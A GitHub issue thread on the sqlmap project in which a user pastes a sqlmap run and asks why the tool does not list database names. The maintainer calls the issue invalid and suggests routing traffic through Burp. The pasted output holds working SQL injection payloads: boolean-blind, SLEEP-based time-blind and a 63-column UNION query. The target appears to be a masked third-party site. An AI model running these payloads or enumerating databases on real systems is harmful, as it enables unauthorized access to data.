### ISSUE TITLE
Hello , can i know , why i cannot get database name from vulnerability  sql ? 

### ISSUE THREAD

**Issue by vitural** [sqlmapproject/sqlmap#2443]
this is what i use to get , please give me some suggest, thank you 

C:\Python27\sqlmap>sqlmap.py -u http://127.0.0.1cat_id=-61 --dbs --dbms=mysql
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.3.6#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 19:30:27

[19:30:27] [INFO] resuming back-end DBMS 'mysql'
[19:30:28] [INFO] testing connection to the target URL
[19:30:29] [WARNING] there is a DBMS error found in the HTTP response body which
 could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1291 AND 6403=6403

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1291 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 63 columns
    Payload: id=1291 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x
46495a7a4d716b4f57694e716f4a4c777444586f67794164674a6a6f50697562736b4959706b6764
,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dpES
---
[19:30:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45
back-end DBMS: MySQL >= 5.0.12
[19:30:29] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.127.0.0.1'

[*] shutting down at 19:30:29

'cat_id' is not recognized as an internal or external command,
operable program or batch file.

C:\Python27\sqlmap>

**Comment by stamparm** [comment]
Sam thing as #2445. Invalid Issue

**Comment by vitural** [comment]
Sorry stamparn , can u suggest more ?  which options , can i should use for this matter ?

**Comment by stamparm** [comment]
As said in #2445, --proxy with Burp in between
